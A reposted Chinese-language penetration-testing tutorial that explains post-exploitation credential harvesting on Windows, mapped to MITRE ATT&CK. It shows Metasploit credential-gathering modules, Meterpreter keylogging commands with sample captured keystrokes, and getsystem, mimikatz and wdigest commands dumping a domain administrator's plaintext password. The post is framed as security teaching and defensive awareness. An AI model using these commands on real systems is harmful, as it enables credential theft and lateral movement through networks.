文章总结: 该文档介绍了后渗透阶段的凭据与令牌收集技术。核心内容包括利用Metasploit模块提取系统存储凭据、通过Meterpreter进行键盘记录获取明文密码以及使用mimikatz从内存中提取域账户明文密码。文章强调明文密码极大便利了横向移动,建议防御方关注凭据保护与异常行为监控。 综合评分: 85 文章分类: 内网渗透,渗透测试,红队,实战经验,安全工具
凭据与令牌的收集技术
原创
寰宇秘阁 寰宇秘阁
寰宇密阁
2026年3月3日 10:00 上海
在成功完成权限扩展并获得管理员或 SYSTEM 权限之后,后渗透阶段的一个核心任务便是收集凭据(Credentials)与访问令牌(Tokens)。
这些信息往往是横向移动、权限提升和最终访问关键业务系统的“通行证”。在实际攻击与红队评估中,很多案例并非利用复杂漏洞,而是通过获取现成的用户名和密码一路扩散到整个网络。
本文将围绕以下几个方面展开:
- 利用管理员权限读取系统中存储的凭据
- 使用 Meterpreter 内置功能进行键盘记录
- 使用 mimikatz 从内存中提取明文密码
- 结合 MITRE ATT&CK 框架理解攻击行为
一、为什么“凭据收集”如此重要?
一旦获得高权限,攻击者可以:
- 读取浏览器或系统保存的账号密码
- 获取本地或域账户的明文密码
- 使用合法凭据进行横向移动
- 避开网络层面的异常流量检测
在 MITRE ATT&CK 框架中,与凭据获取相关的技术包括:
- T1555 – Credentials from Password Stores
- T1552 – Unsecured Credentials
- T1056.001 – Keylogging
- T1003 – OS Credential Dumping
二、从系统中读取已存储的凭据
在 Windows 系统中,部分凭据会被存储在:
- 注册表
- Windows Credential Manager
- 浏览器密码库
- 其他第三方软件配置中
这些数据中,有一部分可以在管理员权限下被直接读取。
Metasploit 凭据收集模块
Metasploit 提供了大量后渗透模块,路径为:
post/windows/gather/credentials/
这些模块可以用来提取:
- 浏览器保存的密码
- Windows 凭据管理器中的内容
- 其他应用程序保存的登录信息
这类技术对应 MITRE ATT&CK 中的 T1555。
三、被低估的攻击方式:明文凭据文件
除了系统和工具自动保存的凭据,还有一类极其常见但常被忽略的风险来源:
- 脚本中的硬编码密码
- Excel / TXT / 配置文件备份
- 明文存储在共享目录中的账号信息
这种方式无需高级技术,也不会在网络中产生明显异常,却经常直接导致目标被攻破。
MITRE ATT&CK 将其定义为:
T1552 – Unsecured Credentials
四、使用 Meterpreter 进行键盘记录(Keylogging)
除了被动读取存储的数据,还可以主动获取用户输入的凭据,例如通过键盘记录器。
在 MITRE ATT&CK 框架中,这种方法对应:
T1056.001 – Input Capture: Keylogging
1. 启动键盘记录
在 Meterpreter 会话中直接执行:
meterpreter > keyscan_start
Starting the keystroke sniffer ...
2. 等待用户输入凭据
此时切换到目标系统,例如:
- 打开内部系统登录页面
- 使用测试账号进行登录
3. 查看捕获的按键信息并停止记录
meterpreter > keyscan_dump
Dumping captured keystrokes...
https<Shift>://intranet<CR>
gazelle01<Tab><Shift>My<Shift>Pass123<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
从输出内容可以直接还原出:
- 访问的 URL
- 用户名
- 明文密码
✅ 重要特点: 该方法不需要管理员权限,因此在某些场景下也可用于进一步扩展本地访问能力。
五、读取本地与域账户密码(mimikatz)
1. Windows 密码存在哪里?
在特定情况下,Windows 会将密码:
- 短暂以明文形式保存在内存中
- 使用可被系统解密的方式缓存
典型场景包括:
- 域用户登录
- 服务使用指定用户账号运行
这类技术在 MITRE ATT&CK 框架中被归类为:
T1003 – OS Credential Dumping
2. mimikatz 简介
mimikatz 是一个广泛使用的凭据提取工具:
- 开源
- 可直接从内存中读取明文密码
- 支持域环境
项目地址: https://github.com/gentilkiwi/mimikatz
Metasploit 已将 mimikatz 集成为 Meterpreter 模块,方便在后渗透阶段直接使用。
六、在 Meterpreter 中使用 mimikatz
1. 确保拥有 SYSTEM 权限
meterpreter > getsystem
got system via technique 1(Named Pipe Impersonation
(In Memory/Admin)).
2. 加载 mimikatz 模块
meterpreter > load mimikatz
Loading extension mimikatz...Success.
3. 通过 wdigest 读取明文密码
在本例中,目标系统为 Windows Server 2012 R2。
使用 wdigest 模块可以读取登录过程中缓存的域凭据:
meterpreter > wdigest
Running as SYSTEM
Retrieving wdigest credentials
wdigest credentials:
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;20785 NTLM
0;467217 NTLM HSILAB Administrator MySecretPassw0rd
✅ 成功获得域管理员的明文密码
七、为什么明文密码如此危险?
与密码哈希不同,这里拿到的是:
- 无需破解
- 可直接使用
- 可立即进行横向认证
因此,即使密码本身非常复杂,也无法抵御这种攻击方式。
结语
在真实的攻击路径中,最危险的往往不是漏洞,而是“已经存在的合法凭据”。
当攻击者成功进入系统并获得高权限后,凭据收集几乎成为一条“必经之路”。 理解这些技术的目的,并不是为了滥用它们,而是为了在防御中清楚地知道:
攻击者下一步最可能做什么,以及我们该如何阻止。
在后续阶段,这些凭据通常会被用于横向移动、权限维持与持久化控制,这也正是企业安全防护中最需要重点关注的部分。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:寰宇密阁 寰宇秘阁 寰宇秘阁《凭据与令牌的收集技术》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论